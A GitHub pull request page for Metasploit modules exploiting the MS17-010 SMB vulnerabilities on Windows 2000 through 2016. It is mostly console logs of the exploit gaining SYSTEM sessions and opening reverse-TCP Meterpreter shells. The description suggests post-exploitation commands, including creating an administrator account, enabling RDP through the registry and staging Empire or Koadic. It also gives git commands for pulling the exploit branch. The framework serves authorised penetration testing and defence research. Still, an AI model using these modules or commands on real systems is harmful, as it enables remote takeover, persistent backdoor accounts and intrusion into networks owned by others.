New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules #9473

Merged
merged 31 commits into from Feb 2, 2018

Conversation

Projects
None yet
@zerosum0x0
Contributor

zerosum0x0 commented Jan 29, 2018

MS17-010 Windows SMB Remote Command and Code Execution modules for all vulnerable targets Windows 2000 through 2016 (and of course the standard home/workstation counterparts).

  • auxiliary/admin/smb/ms17_010_command (run a command)
  • exploit/windows/smb/ms17_010_psexec (stage a payload, i.e. meterpreter)

Screenshots: https://twitter.com/zerosum0x0/status/957839430777057280

You can run any command as SYSTEM, or stage Meterpreter. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.

This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).

  • CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
  • CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests

The exploit chain is an almost 1:1 skid port of @worawit awesome zzz_exploit adaptation, which brings a few improvements over the original Eternal exploits. Instead of going for shellcode execution, it overwrites the SMB connection session structures to gain Admin/SYSTEM session. The MSF module is leaner (stripped down packet count/padding), checks extra named pipes, sprinkles randomness where possible, and has Metasploit's psexec DCERPC implementation bolted onto it. For the last reason, Rex is used and not RubySMB.

Changes to MSF Lib

The exploit needs a smaller SMB Max Buffer Size than the hard-coded values in the Rex SMB proto client libraries. I exposed this as a public member that defaults to the old value. Existing code should not be broken.

Most of the exploit code is in a new mix-in (to be shared for the aux and exploit).

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Authors and project maintainers are not responsible or liable for misuse of the software. Use responsibly.

AV/Firewall Warning

Unlike EternalBlue, the exploit module will drop to disk (or use a PowerShell command).

Standard rules apply when it comes to AV/firewall for the exploit module. The command module should work fine though, try some of the following:

  • net user xyz pw123 /add
  • net localgroup Administrators xyz /add
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • tasklist /v (useful huge output when popping mass scans)
  • stage Empire, Koadic, etc.
  • RTFM

Test Progress

Should work on all unpatched versions of Windows 2000+ x86/x64.

  • Windows 2000 SP0 x86
  • Windows 2000 Professional SP4 x86
  • Windows 2000 Advanced Server SP4 x86
  • Windows XP SP0 x86
  • Windows XP SP1 x86
  • Windows XP SP2 x86
  • Windows XP SP3 x86
  • Windows XP SP2 x64
  • Windows Server 2003 SP0 x86
  • Windows Server 2003 SP1 x86
  • Windows Server 2003 Enterprise SP 2 x86
  • Windows Server 2003 SP1 x64
  • Windows Server 2003 R2 SP1 x86
  • Windows Server 2003 R2 SP2 x86
  • Windows Vista Home Premium x86
  • Windows Vista x64
  • Windows Server 2008 SP1 x86
  • Windows Server 2008 x64
  • Windows 7 x86
  • Windows 7 Ultimate SP1 x86
  • Windows 7 Enterprise SP1 x86
  • Windows 7 SP0 x64
  • Windows 7 SP1 x64
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 SP1 x64
  • Windows 8 x86
  • Windows 8 x64
  • Windows Server 2012 x64
  • Windows 8.1 Enterprise Evaluation 9600 x86
  • Windows 8.1 SP1 x86
  • Windows 8.1 x64
  • Windows 8.1 SP1 x64
  • Windows Server 2012 R2 x86
  • Windows Server 2012 R2 Standard 9600 x64
  • Windows Server 2012 R2 SP1 x64
  • Windows 10 Enterprise 10.10240 x86
  • Windows 10 Enterprise 10.10240 x64
  • Windows 10 10.10586 x86
  • Windows 10 10.10586 x64
  • Windows Server 2016 10.10586 x64
  • Windows 10 10.0.14393 x86
  • Windows 10 Enterprise Evaluation 10.14393 x64
  • Windows Server 2016 Data Center 10.14393 x64

Asking for help in testing thoroughly. Provide crash dumps and pcaps in case of failure. Exploit should virtually never crash post-Vista, and only in extremely rare circumstances for earlier versions.

set VERBOSE 1
set DBGTRACE 1

Todo

Not necessarily for this PR, but some ideas for improvements.

  • MS17-010 auxiliary scanner functionality should be in a mix-in (to use for check()).
  • MS17-010 scanner should try named pipes on vulnerable targets.
  • Add 2000-2016 targets to EternalBlue module, it's still the best when named pipe isn't available.
  • Documentation

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/smb/ms17_010_psexec
  • use auxiliary/admin/smb/ms17_010_command
  • set VERBOSE 1
  • set DBGTRACE 1
  • Document the thing and how it works (Example)
@bcoles

This comment has been minimized.

Contributor

bcoles commented Jan 29, 2018

YUS!

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Jan 29, 2018

Hello again. :-)

@ctx['os'] = 'WIN7'
@ctx['go_fish'] = true
elsif os.starts_with? "Windows Server 2003 "
@ctx['os'] = 'WIN2K3'

This comment has been minimized.

@timwr

timwr Jan 29, 2018

Contributor

Indentation :trollface:

@zerosum0x0 zerosum0x0 changed the title from MS17-010 Eternalsynergy / EternalRomance / EternalChampion aux+exploit modules to MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules Jan 29, 2018

@bcoles

This comment has been minimized.

Contributor

bcoles commented Jan 29, 2018

Success on Windows XP SP3 (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.135
rhost => 172.16.191.135
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.135:445 - Target OS: Windows 5.1
[-] 172.16.191.135:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 172.16.191.135:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 172.16.191.135:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] 172.16.191.135:445 - Connected to named pipe: browser
[*] 172.16.191.135:445 - Filling barrel with fish... done
[*] 172.16.191.135:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.135:445 - 	[*] Preparing dynamite...
[*] 172.16.191.135:445 - Attempt controlling next transaction on x86
[*] 172.16.191.135:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.135:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.135:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.135:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.135:445 - Reading from CONNECTION struct at: 0x89a96da8
[*] 172.16.191.135:445 - Built a write-what-where primitive...
[*] 172.16.191.135:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe1ce5824
[*] 172.16.191.135:445 - Found TOKEN addr: 0x3794415664
[*] 172.16.191.135:445 - UserAndGroupCount: 0x3
[*] 172.16.191.135:445 - UserAndGroupsAddr: 0xe22a30d0
[*] 172.16.191.135:445 - Overwriting token UserAndGroups...
[+] 172.16.191.135:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.191.135:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.191.135:445 - PowerShell not found
[*] 172.16.191.135:445 - Selecting native target
[*] 172.16.191.135:445 - Uploading payload...
[*] 172.16.191.135:445 - Created \SmvXrQeV.exe...
[*] 172.16.191.135:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.135[\svcctl] ...
[*] 172.16.191.135:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.135[\svcctl] ...
[*] 172.16.191.135:445 - Obtaining a service manager handle...
[*] 172.16.191.135:445 - Creating the service...
[+] 172.16.191.135:445 - Successfully created the service
[*] 172.16.191.135:445 - Starting the service...
[+] 172.16.191.135:445 - Service started successfully...
[*] 172.16.191.135:445 - Removing the service...
[+] 172.16.191.135:445 - Successfully removed the service
[*] 172.16.191.135:445 - Closing service handle...
[*] 172.16.191.135:445 - Deleting \SmvXrQeV.exe...
[-] 172.16.191.135:445 - Rex::Proto::SMB::Exceptions::NoReply
[-] 172.16.191.135:445 - The SMB server did not reply to our request
[-] 172.16.191.135:445 - /pentest/exploit/metasploit-framework/lib/rex/proto/smb/client.rb:74:in `smb_recv'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:1036:in `do_smb_echo'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:169:in `write_what_where'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:68:in `eternal_cleanup'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:115:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Sending stage (179779 bytes) to 172.16.191.135
[*] Meterpreter session 1 opened (172.16.191.244:4444 -> 172.16.191.135:2546) at 2018-01-29 05:20:10 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINXP
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
@bcoles

This comment has been minimized.

Contributor

bcoles commented Jan 29, 2018

Success on Windows Vista Home Premium (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.154
rhost => 172.16.191.154
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.154:445 - Target OS: Windows Vista (TM) Home Premium 6000
[*] 172.16.191.154:445 - Connected to named pipe: netlogon
[*] 172.16.191.154:445 - Frag pool info leak: arch=x86, size=0x8
[*] 172.16.191.154:445 - Filling barrel with fish... done
[*] 172.16.191.154:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.154:445 - 	[*] Preparing dynamite...
[*] 172.16.191.154:445 - Attempt controlling next transaction on x86
[*] 172.16.191.154:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.154:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.154:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.154:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.154:445 - Reading from CONNECTION struct at: 0x9526f010
[*] 172.16.191.154:445 - Built a write-what-where primitive...
[*] 172.16.191.154:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e923aa6
[*] 172.16.191.154:445 - Overwrote token SID security context with fake context
[+] 172.16.191.154:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.191.154:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.191.154:445 - PowerShell not found
[*] 172.16.191.154:445 - Selecting native target
[*] 172.16.191.154:445 - Uploading payload...
[*] 172.16.191.154:445 - Created \BdutpgkV.exe...
[*] 172.16.191.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.154[\svcctl] ...
[*] 172.16.191.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.154[\svcctl] ...
[*] 172.16.191.154:445 - Obtaining a service manager handle...
[*] 172.16.191.154:445 - Creating the service...
[+] 172.16.191.154:445 - Successfully created the service
[*] 172.16.191.154:445 - Starting the service...
[+] 172.16.191.154:445 - Service started successfully...
[*] 172.16.191.154:445 - Removing the service...
[+] 172.16.191.154:445 - Successfully removed the service
[*] 172.16.191.154:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 172.16.191.154
[*] 172.16.191.154:445 - Deleting \BdutpgkV.exe...
[-] 172.16.191.154:445 - Rex::Proto::SMB::Exceptions::NoReply
[-] 172.16.191.154:445 - The SMB server did not reply to our request
[-] 172.16.191.154:445 - /pentest/exploit/metasploit-framework/lib/rex/proto/smb/client.rb:74:in `smb_recv'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:1036:in `do_smb_echo'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:169:in `write_what_where'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:73:in `eternal_cleanup'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:115:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.154:49169) at 2018-01-29 05:35:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : VISTA
OS              : Windows Vista (Build 6000).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
@bcoles

This comment has been minimized.

Contributor

bcoles commented Jan 29, 2018

Fail on Windows Server 2003 SP2 with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.171
rhost => 172.16.191.171
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.171:445 - Target OS: Windows Server 2003 R2 3790 Service Pack 2
[*] 172.16.191.171:445 - Connected to named pipe: netlogon
[*] 172.16.191.171:445 - Filling barrel with fish... done
[*] 172.16.191.171:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.171:445 - 	[*] Preparing dynamite...
[*] 172.16.191.171:445 - Attempt controlling next transaction on 
[*] 172.16.191.171:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.171:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.171:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.171:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.171:445 - Reading from CONNECTION struct at: 0x81305d48
[*] 172.16.191.171:445 - Built a write-what-where primitive...
[*] 172.16.191.171:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe1051556
[*] 172.16.191.171:445 - Found TOKEN addr: 0x3778995736
[*] 172.16.191.171:445 - UserAndGroupCount: 0x5
[*] 172.16.191.171:445 - UserAndGroupsAddr: 0xe13ee6b8
[*] 172.16.191.171:445 - Overwriting token UserAndGroups...
[-] 172.16.191.171:445 - NoMethodError
[-] 172.16.191.171:445 - undefined method `pack' for 4:Fixnum
[-] 172.16.191.171:445 - /pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:132:in `modify_token'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:55:in `eternal_pwn'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:99:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
@bcoles

This comment has been minimized.

Contributor

bcoles commented Jan 29, 2018

Fail on Windows XP Professional SP0 (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.158
rhost => 172.16.191.158
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.158:445 - Target OS: Windows 5.1
[*] 172.16.191.158:445 - Connected to named pipe: netlogon
[*] 172.16.191.158:445 - Filling barrel with fish... done
[*] 172.16.191.158:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.158:445 - 	[*] Preparing dynamite...
[*] 172.16.191.158:445 - Attempt controlling next transaction on x86
[*] 172.16.191.158:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.158:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.158:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.158:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.158:445 - Reading from CONNECTION struct at: 0x85d84220
[*] 172.16.191.158:445 - Built a write-what-where primitive...
[*] 172.16.191.158:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe192095c
[*] 172.16.191.158:445 - Found TOKEN addr: 0x3775231688
[*] 172.16.191.158:445 - UserAndGroupCount: 0x180
[*] 172.16.191.158:445 - UserAndGroupsAddr: 0xe1057750
[*] 172.16.191.158:445 - Overwriting token UserAndGroups...
[-] 172.16.191.158:445 - NoMethodError
[-] 172.16.191.158:445 - undefined method `pack' for 4:Fixnum
[-] 172.16.191.158:445 - /pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:132:in `modify_token'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:55:in `eternal_pwn'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:99:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
@ronnieflip

This comment has been minimized.

ronnieflip commented Jan 29, 2018

Damn, thanks a bunch. I soon as I deployed this on my early morning pentest I owned AD in seconds 🥇

@bcoles

This comment has been minimized.

Contributor

bcoles commented Jan 29, 2018

Success on Windows 2000 Professional SP4 (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.160
rhost => 172.16.191.160
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.160:445 - Target OS: Windows 5.0
[*] 172.16.191.160:445 - Connected to named pipe: netlogon
[*] 172.16.191.160:445 - Filling barrel with fish... done
[*] 172.16.191.160:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.160:445 - 	[*] Preparing dynamite...
[*] 172.16.191.160:445 - Attempt controlling next transaction on x86
[*] 172.16.191.160:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.160:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.160:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.160:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.160:445 - Reading from CONNECTION struct at: 0x81e48690
[*] 172.16.191.160:445 - Built a write-what-where primitive...
[*] 172.16.191.160:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe1d2b2c4
[*] 172.16.191.160:445 - Found TOKEN addr: 0x3786623280
[*] 172.16.191.160:445 - UserAndGroupCount: 0x4
[*] 172.16.191.160:445 - UserAndGroupsAddr: 0xe1b349c8
[*] 172.16.191.160:445 - Overwriting token UserAndGroups...
[+] 172.16.191.160:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.191.160:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.191.160:445 - PowerShell not found
[*] 172.16.191.160:445 - Selecting native target
[*] 172.16.191.160:445 - Uploading payload...
[*] 172.16.191.160:445 - Created \xJobxaMJ.exe...
[*] 172.16.191.160:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.160[\svcctl] ...
[*] 172.16.191.160:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.160[\svcctl] ...
[*] 172.16.191.160:445 - Obtaining a service manager handle...
[*] 172.16.191.160:445 - Creating the service...
[+] 172.16.191.160:445 - Successfully created the service
[*] 172.16.191.160:445 - Starting the service...
[+] 172.16.191.160:445 - Service started successfully...
[*] 172.16.191.160:445 - Removing the service...
[+] 172.16.191.160:445 - Successfully removed the service
[*] 172.16.191.160:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 172.16.191.160
[*] 172.16.191.160:445 - Deleting \xJobxaMJ.exe...
[-] 172.16.191.160:445 - Rex::Proto::SMB::Exceptions::NoReply
[-] 172.16.191.160:445 - The SMB server did not reply to our request
[-] 172.16.191.160:445 - /pentest/exploit/metasploit-framework/lib/rex/proto/smb/client.rb:74:in `smb_recv'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:1036:in `do_smb_echo'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:169:in `write_what_where'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:68:in `eternal_cleanup'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:115:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Meterpreter session 4 opened (172.16.191.244:4444 -> 172.16.191.160:1027) at 2018-01-29 07:18:14 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2000PRO
OS              : Windows 2000 (Build 2195).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
@iNoSec

This comment has been minimized.

iNoSec commented Jan 31, 2018

How WE Can merge your branch to help you testing? Sry new to github

@zerosum0x0

This comment has been minimized.

Contributor

zerosum0x0 commented Jan 31, 2018

@bwatters-r7 very interested in all service packs of Server 2003 actually. Could have similar issues as XP did.

@iNoSec something like (untested)

git clone https://github.com/rapid7/metasploit-framework/
cd metasploit-framework
git remote add rs https://github.com/RiskSense-Ops/metasploit-framework/
git pull rs eternalsynergy
@bwatters-r7

This comment has been minimized.

Contributor

bwatters-r7 commented Feb 1, 2018

FYI, tests still running, but Win2003x86_SP0 succeeded.

Win2003x64_SP1 failed; debug output:

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DBGTRACE              true             yes       Show extra debug trace info
   LEAKATTEMPTS          99               yes       How many times to try to leak transaction
   NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                 192.168.136.121  yes       The target address
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               [REDACTED]     no        The password for the specified username
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.112  yes       The listen address
   LPORT     30001            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/exploit-windows-smb-ms17_010_psexec_192.168.136.121_30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/exploit-windows-smb-ms17_010_psexec_192.168.136.121_30001.rc)> check
[*] 192.168.136.121:445 This module does not support check.
resource (/home/msfuser/rapid7/test_artifacts/test_rc/exploit-windows-smb-ms17_010_psexec_192.168.136.121_30001.rc)> run -z
[*] Started reverse TCP handler on 192.168.135.112:30001 
[*] 192.168.136.121:445 - Target OS: Windows Server 2003 3790 Service Pack 1
[*] 192.168.136.121:445 - Connected to named pipe: netlogon
[*] 192.168.136.121:445 - Filling barrel with fish... done
[*] 192.168.136.121:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.136.121:445 - 	[*] Preparing dynamite...
[*] 192.168.136.121:445 - Attempt controlling next transaction on 
[*] 192.168.136.121:445 - 		Trying stick 1 (x86)...Miss
[-] 192.168.136.121:445 - NoMethodError
[-] 192.168.136.121:445 - undefined method `[]' for nil:NilClass
[-] 192.168.136.121:445 - /home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:657:in `block in exploit_fish_barrel'
